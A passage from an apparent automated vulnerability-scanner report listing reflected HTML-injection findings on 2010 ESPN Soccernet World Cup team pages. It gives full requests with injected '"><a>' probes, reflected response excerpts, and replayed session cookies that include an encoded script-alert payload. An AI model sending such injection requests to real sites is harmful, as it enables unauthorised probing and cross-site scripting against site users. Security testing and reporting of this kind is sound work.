Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:26:01 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:26:01 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN17
Cache-Expires: Sat, 06 Nov 2010 23:31:01 GMT
Content-Length: 82091
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>New Zealand Footbal ...[SNIP]... <a href="/worldcup2010/team?team=2666&_slug_=new-zealand17070"><a>7043290c14&topId=801589&linktext=Coach+delighted+with+unbeaten+run"> ...[SNIP]...
2.20. http://soccernet.espn.go.com/worldcup2010/team/_/team/2666/new-zealand [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/2666/new-zealand
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6fb3e"><a>31ef275d77e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/2666/new-zealand?6fb3e"><a>31ef275d77e=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:22:18 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:22:18 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN33
Cache-Expires: Sat, 06 Nov 2010 23:27:18 GMT
Content-Length: 82203
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>New Zealand Footbal ...[SNIP]... <a href="/worldcup2010/team?team=2666&6fb3e"><a>31ef275d77e=1&_slug_=new-zealand&6fb3e"> ...[SNIP]...
2.21. http://soccernet.espn.go.com/worldcup2010/team/_/team/4469/ghana [REST URL parameter 6]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/4469/ghana
Issue detail
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b56f"><a>36f0e92eb87 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/4469/ghana3b56f"><a>36f0e92eb87 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:10:00 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:10:00 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN01
Cache-Expires: Sat, 06 Nov 2010 23:15:00 GMT
Content-Length: 81725
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Ghana Football / So ...[SNIP]... <a href="/worldcup2010/team?team=4469&_slug_=ghana3b56f"><a>36f0e92eb87&topId=805277&linktext=Ghana+crushed%2C+Uruguay+through"> ...[SNIP]...
2.22. http://soccernet.espn.go.com/worldcup2010/team/_/team/4469/ghana [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/4469/ghana
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aea54"><a>47a90bab802 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/4469/ghana?aea54"><a>47a90bab802=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:08:43 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:08:43 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN11
Cache-Expires: Sat, 06 Nov 2010 23:13:42 GMT
Content-Length: 81833
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Ghana Football / So ...[SNIP]... <a href="/worldcup2010/team?team=4469&aea54"><a>47a90bab802=1&_slug_=ghana&aea54"> ...[SNIP]...
2.23. http://soccernet.espn.go.com/worldcup2010/team/_/team/448/england [REST URL parameter 6]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/448/england
Issue detail
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 139f9"><a>a59e25551c6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/448/england139f9"><a>a59e25551c6 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:09:11 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:09:11 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN21 Cache-Expires: Sat, 06 Nov 2010 23:14:10 GMT Content-Length: 80274 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>England Football / ...[SNIP]... <a href="/worldcup2010/team?team=448&_slug_=england139f9"><a>a59e25551c6&topId=805083&linktext=FA+confirms+Capello+will+stay+on"> ...[SNIP]...
2.24. http://soccernet.espn.go.com/worldcup2010/team/_/team/448/england [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/448/england
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6170"><a>7607dfaf4a2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/448/england?d6170"><a>7607dfaf4a2=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:07:48 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:07:48 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN20 Cache-Expires: Sat, 06 Nov 2010 23:12:48 GMT Content-Length: 80382 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>England Football / ...[SNIP]... <a href="/worldcup2010/team?team=448&d6170"><a>7607dfaf4a2=1&_slug_=england&d6170"> ...[SNIP]...
2.25. http://soccernet.espn.go.com/worldcup2010/team/_/team/449/netherlands [REST URL parameter 6]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/449/netherlands
Issue detail
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a26e"><a>ecad0508930 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/449/netherlands7a26e"><a>ecad0508930 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:24:22 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:24:22 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN21 Cache-Expires: Sat, 06 Nov 2010 23:29:22 GMT Content-Length: 81781 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Netherlands Footbal ...[SNIP]... <a href="/worldcup2010/team?team=449&_slug_=netherlands7a26e"><a>ecad0508930&topId=808125&linktext=Andres+Iniesta+fires+Spain+to+glory"> ...[SNIP]...
2.26. http://soccernet.espn.go.com/worldcup2010/team/_/team/449/netherlands [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/449/netherlands
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload accaf"><a>fe1ec450d74 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/449/netherlands?accaf"><a>fe1ec450d74=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
